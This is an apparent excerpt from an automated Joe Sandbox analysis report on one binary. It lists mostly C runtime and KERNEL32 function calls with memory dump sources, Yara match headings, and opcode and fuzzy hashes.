                                                    • __lock.LIBCMT ref: 006208BE
                                                    • ___addlocaleref.LIBCMT ref: 006208DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                    • String ID: @.B$KERNEL32.DLL
                                                    • API String ID: 4021795732-2520587274
                                                    • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                    • Instruction ID: 1defe282c22c8649c5b22d05ea391ba733920d37ac28ca0c017b78a3e08e80e2
                                                    • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                    • Instruction Fuzzy Hash: A0117571940B11EEE760EF75E80178EBBE5AF04310F50852EE899A73A1CB7899818F5C
                                                    APIs
                                                    • _malloc.LIBCMT ref: 004057DE
                                                      • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                      • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                      • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                    • _malloc.LIBCMT ref: 00405842
                                                    • _malloc.LIBCMT ref: 00405906
                                                    • _malloc.LIBCMT ref: 00405930
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _malloc$AllocateHeap
                                                    • String ID: 1.2.3
                                                    • API String ID: 680241177-2310465506
                                                    • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                    • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                    • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                    • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                    APIs
                                                    • _malloc.LIBCMT ref: 00615A2E
                                                      • Part of subcall function 0061BA9D: __FF_MSGBANNER.LIBCMT ref: 0061BAC0
                                                      • Part of subcall function 0061BA9D: __NMSG_WRITE.LIBCMT ref: 0061BAC7
                                                    • _malloc.LIBCMT ref: 00615A92
                                                    • _malloc.LIBCMT ref: 00615B56
                                                    • _malloc.LIBCMT ref: 00615B80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _malloc
                                                    • String ID: 1.2.3
                                                    • API String ID: 1579825452-2310465506
                                                    • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                    • Instruction ID: a013a9b196a3577675c1498f4b9df6016b010cc9a918192476b9cb60cb800d16
                                                    • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                    • Instruction Fuzzy Hash: E161D371988B80CFC7209F2988805EBFBE2BF95310F58492EE5DB87740D77594C98B56
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                    • String ID:
                                                    • API String ID: 3886058894-0
                                                    • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                    • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                    • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                    • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                    • String ID:
                                                    • API String ID: 3886058894-0
                                                    • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                    • Instruction ID: 526c7e1a758be8e59f5316749ca0f461e0e0ed8bbcaa45c702ba20f771ebae6a
                                                    • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                    • Instruction Fuzzy Hash: D251B371940204EFCB209FA98C449DEBB77EF84370F288259F82596291D7329ED2DF54
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __fileno$__getptd_noexit__lock_file
                                                    • String ID: 'B
                                                    • API String ID: 3755561058-2787509829
                                                    • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                    • Instruction ID: 1be658b5d1ffea50a81fc72cbcd8cc0f162174520f6d53429660552a1f1f0ea3
                                                    • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                    • Instruction Fuzzy Hash: 9B01AB2318461456C29177782C434FE77A28E81B3033E4B1DF4609B1E2CB28C9C2A2D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \s]q$\s]q$\s]q$\s]q$\s]q$\s]q$\s]q
                                                    • API String ID: 0-412914560
                                                    • Opcode ID: 07802c66a27034b22dfc8b196c020cb8cbdcb09d45a8a495617c0c4419e1ff04
                                                    • Instruction ID: ea73e25d9cac72c9428ba8162d4312daff0fc841a90e2b48fa2774b4cbcee28f
                                                    • Opcode Fuzzy Hash: 07802c66a27034b22dfc8b196c020cb8cbdcb09d45a8a495617c0c4419e1ff04
                                                    • Instruction Fuzzy Hash: 70A15934A40306DFCB04DF69C98496ABBF2FF88304B5489A9E8599B765DB30FC45CB90
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00414744
                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                    • __getptd.LIBCMT ref: 0041475B
                                                    • __amsg_exit.LIBCMT ref: 00414769
                                                    • __lock.LIBCMT ref: 00414779
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                    • String ID: @.B
                                                    • API String ID: 3521780317-470711618
                                                    • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                    • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                    • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                    • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00624994
                                                      • Part of subcall function 00620985: __getptd_noexit.LIBCMT ref: 00620988
                                                      • Part of subcall function 00620985: __amsg_exit.LIBCMT ref: 00620995
                                                    • __getptd.LIBCMT ref: 006249AB
                                                    • __amsg_exit.LIBCMT ref: 006249B9
                                                    • __lock.LIBCMT ref: 006249C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                    • String ID: @.B
                                                    • API String ID: 3521780317-470711618
                                                    • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                    • Instruction ID: 3c9deead922af82378ed5d8b5876dd8dac5f80fe79a44164d117d744ebf1a905
                                                    • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                    • Instruction Fuzzy Hash: 52F06D31E00E209AE7A0FB74A50278E73A3AB04720F55425DE849A72D2CF65A8C19E99
                                                    APIs
                                                    • ___addlocaleref.LIBCMT ref: 0062495C
                                                    • ___removelocaleref.LIBCMT ref: 00624967
                                                    • ___freetlocinfo.LIBCMT ref: 0062497B
                                                      • Part of subcall function 006246D9: ___free_lconv_mon.LIBCMT ref: 0062471F
                                                      • Part of subcall function 006246D9: ___free_lconv_num.LIBCMT ref: 00624740
                                                      • Part of subcall function 006246D9: ___free_lc_time.LIBCMT ref: 006247C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                    • String ID: @.B$@.B
                                                    • API String ID: 4212647719-183327057
                                                    • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                    • Instruction ID: 518dcd53d9c59637134304cd79db5fccb793cdf65f9ad64b8395ecb59d38788b
                                                    • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
                                                    • Instruction Fuzzy Hash: 28E04F22D25C31558B37251C74412EBD39F4F827A1B2A026AF804EBA54DF288CC19C99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (_]q$(_]q$(_]q$(_]q$(_]q$(_]q
                                                    • API String ID: 0-414434136
                                                    • Opcode ID: 19ee9e19d110ee579157a82af9d50ab656ef9872f9cfb0f160c238c9e4c6b0fc
                                                    • Instruction ID: 2f79fc577f9f0fc91438e805acb41ccb3e62117a35b49b59946169fb5bee97ec
                                                    • Opcode Fuzzy Hash: 19ee9e19d110ee579157a82af9d50ab656ef9872f9cfb0f160c238c9e4c6b0fc
                                                    • Instruction Fuzzy Hash: 5AD19C74B04304AFCB059F79C4545AEBFB2EF89350F6484AAE846DB381DE39D906CB91
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 0040C6C8
                                                    • __fileno.LIBCMT ref: 0040C6D6
                                                    • __fileno.LIBCMT ref: 0040C6E2
                                                    • __fileno.LIBCMT ref: 0040C6EE
                                                    • __fileno.LIBCMT ref: 0040C6FE
                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2805327698-0
                                                    • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                    • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                    • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                    • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00413FD8
                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                    • __amsg_exit.LIBCMT ref: 00413FF8
                                                    • __lock.LIBCMT ref: 00414008
                                                    • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                    • InterlockedIncrement.KERNEL32(024F1670), ref: 00414050
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                    • String ID:
                                                    • API String ID: 4271482742-0
                                                    • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                    • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                    • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                    • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00624228
                                                      • Part of subcall function 00620985: __getptd_noexit.LIBCMT ref: 00620988
                                                      • Part of subcall function 00620985: __amsg_exit.LIBCMT ref: 00620995
                                                    • __amsg_exit.LIBCMT ref: 00624248
                                                    • __lock.LIBCMT ref: 00624258
                                                    • InterlockedDecrement.KERNEL32(?), ref: 00624275
                                                    • InterlockedIncrement.KERNEL32(00422D38), ref: 006242A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                    • String ID:
                                                    • API String ID: 4271482742-0
                                                    • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                    • Instruction ID: cbb9d797caeb5e10759e037951eb7ef47bfbd1b52245fbf6e3d342adc865460f
                                                    • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                    • Instruction Fuzzy Hash: 3501A131A02A35EBD760AB66B90579EB762AF44750F450019FC14A7390CB78AA81CFD9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $2$l
                                                    • API String ID: 0-3132104027
                                                    • Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                    • Instruction ID: c5f5062b8c0c5ac600465367c0b777e3db35e600d7468434c96f4c4c3ab22c65
                                                    • Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
                                                    • Instruction Fuzzy Hash: 0841B534D499788AEB348E18A8993F877B3AB2B311F1401DAC0956E2D6C7750EC7CF05
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: P$B$`$B
                                                    • API String ID: 3494438863-235554963
                                                    • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                    • Instruction ID: bf74678eb0d8c5756ccffa29d3347b03f6955327a28104c34fd10be359ae5bbf
                                                    • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                    • Instruction Fuzzy Hash: 571106327046255BE7648B2CBD40BF22393FB95324B6C423BE615CA3D0E770D8C2568C
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                    • API String ID: 1646373207-3105848591
                                                    • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                    • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                    • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                    • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                    APIs
                                                    • lstrlen.KERNEL32(?), ref: 00611B56
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 00611B7F
                                                    • GetLastError.KERNEL32 ref: 00611B90
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00611BA8
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00611BD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                    • String ID:
                                                    • API String ID: 3322701435-0
                                                    • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                    • Instruction ID: 5414d4a33b110ce7b6db0efc1c0346d9270c3278e5d36953e81dad40d37fd0a8
                                                    • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                    • Instruction Fuzzy Hash: 3111B2315452147BD33097158C88FA77F6CEF86BA5F048158FA459E281D621AD44C6B8
                                                    APIs
                                                    • __fileno.LIBCMT ref: 0040C77C
                                                    • __locking.LIBCMT ref: 0040C791
                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                    • String ID:
                                                    • API String ID: 2395185920-0
                                                    • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                    • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                    • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                    • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                    APIs
                                                    • __fileno.LIBCMT ref: 0061C9CC
                                                    • __locking.LIBCMT ref: 0061C9E1
                                                      • Part of subcall function 0061C211: __getptd_noexit.LIBCMT ref: 0061C211
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __fileno__getptd_noexit__locking
                                                    • String ID:
                                                    • API String ID: 630670418-0
                                                    • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                    • Instruction ID: bb9d3947759f1ceb352c8cfa8c59cf9f2745fef506cfb83a0d16fce1aa2a3e5e
                                                    • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                    • Instruction Fuzzy Hash: B151D171E44209AFDB11CFA8D881BDDBBB2AF04364F1C8169E815A7381D770AEC1CB85
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _fseek_malloc_memset
                                                    • String ID:
                                                    • API String ID: 208892515-0
                                                    • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                    • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                    • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                    • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                    APIs
                                                    • __flush.LIBCMT ref: 0040BB6E
                                                    • __fileno.LIBCMT ref: 0040BB8E
                                                    • __locking.LIBCMT ref: 0040BB95
                                                    • __flsbuf.LIBCMT ref: 0040BBC0
                                                      • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                      • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                    • String ID:
                                                    • API String ID: 3240763771-0
                                                    • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                    • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                    • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                    • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                                                    • String ID:
                                                    • API String ID: 1291973410-0
